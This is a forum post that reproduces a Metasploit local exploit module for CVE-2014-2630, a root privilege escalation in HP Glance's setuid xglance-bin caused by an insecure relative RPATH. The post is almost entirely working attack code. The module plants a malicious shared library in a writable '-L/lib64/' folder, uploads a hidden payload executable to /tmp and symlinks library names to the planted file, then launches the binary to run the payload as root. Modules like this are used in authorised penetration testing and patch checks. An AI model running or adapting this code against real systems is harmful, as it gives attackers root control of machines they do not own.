Jump to content
Kev

HP Performance Monitoring xglance Privilege Escalation

Recommended Posts

Posted
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Performance Monitoring xglance Priv Esc',
        'Description' => %q{
          This exploit takes advantage of xglance-bin, part of
          HP's Glance (or Performance Monitoring) version 11 'and subsequent'
          , which was compiled with an insecure RPATH option.  The RPATH includes
          a relative path to -L/lib64/ which can be controlled by a user.
          Creating libraries in this location will result in an
          escalation of privileges to root.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'h00die', # msf module
            'Tim Brown', # original finding
            'Robert Jaroszuk', # exploit
            'Marco Ortisi', # exploit
          ],
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' =>
          [
            [ 'Automatic', {} ],
            [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
            [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
          ],
        'Privileged' => true,
        'References' =>
          [
            [ 'EDB', '48000' ],
            [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding
            [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit
            [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],
            [ 'PACKETSTORM', '156206' ],
            [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],
            [ 'CVE', '2014-2630' ]
          ],
        'DisclosureDate' => 'Nov 19 2014',
        'DefaultTarget' => 0
      )
    )
    register_options [
      OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]

  end

  # Simplify pulling the writable directory variable
  def base_dir
    datastore['WritableDir'].to_s
  end

  def exploit_folder
    "#{base_dir}/-L/lib64/"
  end

  def glance_path
    datastore['GLANCE_PATH'].to_s
  end

  # Pull the exploit binary or file (.c typically) from our system
  def exploit_data(file)
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)
  end

  def find_libs
    libs = cmd_exec "ldd #{glance_path} | grep libX"
    %r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs
    return nil if lib.nil?

    lib
  end

  def check
    unless setuid? glance_path
      vprint_error "#{glance_path} not found on system"
      return CheckCode::Safe
    end
    lib = find_libs
    if lib.nil?
      vprint_error 'Patched xglance-bin, not linked to -L/lib64/'
      return CheckCode::Safe
    end
    vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"
    CheckCode::Appears
  end

  def exploit
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # delete exploit folder in case a previous attempt failed
    vprint_status("Deleting exploit folder: #{base_dir}/-L")
    rm_cmd = "rm -rf \"#{base_dir}/-L\""
    cmd_exec(rm_cmd)
    # make folder
    vprint_status("Creating exploit folder: #{exploit_folder}")
    cmd_exec "mkdir -p #{exploit_folder}"
    register_dir_for_cleanup "#{base_dir}/-L"

    # drop our .so on the system that calls our payload
    # we need gcc to compile instead of metasm since metasm
    # removes unused variables, which we need to keep xglance-bin
    # from breaking and not launching our exploit
    so_file = "#{exploit_folder}libXm.so.3"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
      code = exploit_data('CVE-2014-2630.c')
      code.sub!('#{payload_path}', payload_path) # inject our payload path
      upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'
      rm_f "#{so_file}.c"
    else
      payload_path = '/tmp/.u4aLoiq'
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx so_file, exploit_data('libXm.so.3')
    end

    # Upload payload executable
    vprint_status 'uploading payload'
    upload_and_chmodx payload_path, generate_payload_exe

    # link so files to exploit vuln
    lib = find_libs
    # just to be safe, Xt and Xp were in the original exploit
    # our mock binary is also exploitsable through libXmu.so.6
    # unsure about the real binary
    cd exploit_folder
    ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|
      cmd_exec "ln -s libXm.so.3 #{l}"
    end

    # Launch exploit
    print_status 'Launching xglance-bin...'
    cd base_dir
    output = cmd_exec glance_path
    output.each_line { |line| vprint_status line.chomp }
    print_warning("Manual cleanup of #{exploit_folder} may be required")
  end
end

Author: Tim Brown

 

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...